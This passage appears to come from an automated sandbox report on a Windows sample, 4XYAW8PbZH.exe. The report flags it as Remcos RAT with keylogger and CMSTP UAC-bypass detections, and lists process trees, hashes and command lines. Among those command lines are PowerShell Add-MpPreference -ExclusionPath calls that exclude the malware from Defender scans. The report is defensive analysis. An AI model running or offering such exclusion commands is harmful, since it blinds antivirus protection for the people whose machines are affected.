                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                            Start time:12:41:52
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe"
                                                                                                                                                                                            Imagebase:0x7f0000
                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                            Start time:12:41:52
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Users\user\Desktop\4XYAW8PbZH.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\4XYAW8PbZH.exe"
                                                                                                                                                                                            Imagebase:0x9d0000
                                                                                                                                                                                            File size:985'600 bytes
                                                                                                                                                                                            MD5 hash:4A9440BAA61BE8363A372B0BBC5933AD
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                            Start time:12:41:52
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                            Start time:12:41:53
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1372
                                                                                                                                                                                            Imagebase:0xa50000
                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                            Start time:12:41:53
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                                            Imagebase:0x200000
                                                                                                                                                                                            File size:985'600 bytes
                                                                                                                                                                                            MD5 hash:4A9440BAA61BE8363A372B0BBC5933AD
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 68%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                            Start time:12:41:56
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                                            Imagebase:0x7f0000
                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                            Start time:12:41:56
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                            Start time:12:41:56
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                                            Imagebase:0x610000
                                                                                                                                                                                            File size:985'600 bytes
                                                                                                                                                                                            MD5 hash:4A9440BAA61BE8363A372B0BBC5933AD
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                            Start time:12:41:56
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                            Start time:12:41:56
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7188 -s 1276
                                                                                                                                                                                            Imagebase:0xa50000
                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                            Start time:12:41:56
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                            Imagebase:0x7ff693ab0000
                                                                                                                                                                                            File size:496'640 bytes
                                                                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                            Start time:12:42:00
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                            Start time:12:42:01
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2300,i,10737837625504977776,1997224637472770813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                            Start time:12:42:04
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                            Start time:12:42:04
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2012,i,4138460331120134385,5683384739135737573,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                            Start time:12:42:04
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                            Start time:12:42:13
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                            Start time:12:42:13
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,2517950207159565068,10782540892853908230,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                            Start time:12:42:13
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                            Start time:12:42:16
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                            Start time:12:42:17
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1980,i,683593662308323729,9862283109921041436,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                            Start time:12:42:17
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x7ff70f330000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                            Start time:12:42:21
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                            Start time:12:42:21
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=828 --field-trial-handle=1136,i,5921432477754910368,13753575883471156045,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                            Start time:12:42:26
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                            Start time:12:42:26
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,17133631053466548675,5917926669792758127,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                            Start time:12:42:26
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                            Start time:12:42:30
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                            Start time:12:42:31
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1908,i,16046133886444858587,11187754230774806872,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                            Start time:12:42:33
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

